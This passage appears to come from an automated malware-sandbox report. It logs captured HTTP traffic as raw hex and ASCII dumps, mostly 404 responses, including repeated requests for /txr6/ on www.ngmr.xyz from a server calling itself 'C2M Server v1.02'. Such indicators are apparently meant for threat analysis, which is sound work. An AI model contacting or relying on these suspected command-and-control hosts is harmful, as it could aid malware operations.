7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 a2 3b 25 f5 33 38 54 d5 ac d1 9e 9e 85 fd 5a 42 7d 9c ed cb c1 0a 07 12 a1 c2 17 41 78 3d d2 5a 04 69 74 c6 73 07 f2 d2 b0 73 b7 6d c1 6f 88 cd c0 8d 65 b0 7f ef 59 8b d8 64 84 ae a3 ec 67 d3 75 a8 83 27 50 0a a2 46 69 ca ef 14 a1 c7 2e 3a 3f fd db f8 34 58 ec cc 57 f9 1e 43 90 fa e0 a1 82 91 ec 85 c7 8f 4e 91 32 92 e3 3e 64 0f 99 67 03 33 ee f0 b0 2a 4d b7 87 ac 36 0e 1f 32 04 2f e3 43 96 2f 19 67 f3 87 6c 5d 9c d7 c5 43 46 52 82 e7 40 4a 72 fa 8b e7 43 4a fc e9 80 33 eb 4f 87 8f 36 7f 3a fc fa fd 2e 7f ba 24 d3 bb 1a 49 39 92 da e8 5a 84 a0 82 66 88 c2 22 97 67 3e 64 83 a5 15 40 ee 21 fb ea 67 42 bc 77 9c 3a 54 28 3c b2 4e 6a f6 d5 7f 7f 42 57 ad d8 8a 15 e4 7a dd 46 d9 cb 9b 7d 36 9c 5c 2b 15 82 f4 20 fa 60 e8 be 01 e6 c6 06 5e 66 d1 cd ca 3f 97 1b cb 54 27 e3 49 38 30 a9 4f 71 bb ac 3b d4 31 26 63 70 97 e5 ad a1 1a f7 6b b8 d0 07 f4 c1 97 98 b6 22 e9 b2 ae 6e 4c d8 61 f0 fe 14 5e b7 71 72 dd 7a f4 5e 1a fd 3e 18 27 0e c8 3c 86 3f 03 76 b1 49 ff 7a ff fa 3f cc 07 27 f5 41 b6 97 38 24 c9 b5 52 6e 1d af 57 12 7e 5e 1b 63 1a 52 9d 8c c8 f6 4e 7d 2d de 61 1d 62 9e f2 14 59 2d f4 49 78 56 5f a8 59 72 d7 96 d7 2a 49 91 b5 52 a9 0f 78 0e 71 48 79 ca 93 6d 22 de a0 35 0e f0 51 ea 30 2f 7e 74 4e 5c 62 64 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcP
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Wed, 25 Sep 2024 07:58:02 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Wed, 25 Sep 2024 07:58:04 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Wed, 25 Sep 2024 07:58:07 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Wed, 25 Sep 2024 07:58:10 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 693connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 69 6d 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 a1 a3 3c 62 72 3e 0a 20 20 20 20 20 20 33 30 c9 c3 b8 e5 a4 cb a5 b7 a5 e7 a5 c3 a5 d7 a5 da a1 bc a5 b8 a4 d8 c5 be c1 f7 a4 b7 a4 de a4 b9 a1 a3 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 54 4f 50 a5 da a1 bc a5 b8 3c 2f 61 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 72 65 64 69 72 65 63 74 28 29 22 2c 20 33 30 30 30 30 29 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 25 Sep 2024 08:22:19 GMTX-Varnish: 1105031287Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 25 Sep 2024 08:22:21 GMTX-Varnish: 1105031295Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 25 Sep 2024 08:22:24 GMTX-Varnish: 1105031299Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 25 Sep 2024 08:22:27 GMTX-Varnish: 1105031301Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 78 72 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /txr6/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 08:00:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 08:00:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 